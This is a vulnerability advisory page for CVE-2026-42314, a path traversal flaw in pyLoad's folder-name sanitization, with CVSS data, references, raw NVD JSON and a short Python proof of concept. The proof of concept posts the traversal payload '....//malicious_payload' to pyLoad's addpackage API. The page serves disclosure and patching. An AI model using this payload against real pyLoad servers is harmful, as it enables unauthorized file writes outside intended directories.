CVE-2026-42314

Description

pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, package folder names are sanitized using insufficient string replacement. The pattern ....// becomes .._ after replacement (partial removal), leaving .. which can be exploited when the path is later resolved by the OS. This vulnerability is fixed in 0.5.0b3.dev100.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

pyLoad < 0.5.0b3.dev100

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL example, adjust to actual pyLoad installation
target_url = "http://127.0.0.1:8000/api/addpackage"

# The vulnerability lies in the folder name sanitization.
# The pattern "....//" is insufficiently replaced, leaving ".." which acts as a parent directory traversal.
malicious_folder_name = "....//malicious_payload"

payload = {
    "name": "Exploit Test",
    "folder": malicious_folder_name,
    "links": "http://example.com/file.zip"
}

try:
    print(f"[*] Attempting to create folder with traversal payload: {malicious_folder_name}")
    response = requests.post(target_url, data=payload)
    
    if response.status_code == 200:
        print("[+] Request sent successfully. Check if the file was created outside the intended directory.")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42314
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42314
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42314/
[4] VulDB https://vuldb.com/cve/CVE-2026-42314
[5] https://github.com/pyload/pyload/security/advisories/GHSA-97r3-5w84-r4q8
[6] https://github.com/pyload/pyload/security/advisories/GHSA-97r3-5w84-r4q8

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42314", "sourceIdentifier": "[email protected]", "published": "2026-05-11T18:16:35.123", "lastModified": "2026-05-11T20:25:42.537", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, package folder names are sanitized using insufficient string replacement. The pattern ....// becomes .._ after replacement (partial removal), leaving .. which can be exploited when the path is later resolved by the OS. This vulnerability is fixed in 0.5.0b3.dev100."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/pyload/pyload/security/advisories/GHSA-97r3-5w84-r4q8", "source": "[email protected]"}, {"url": "https://github.com/pyload/pyload/security/advisories/GHSA-97r3-5w84-r4q8", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}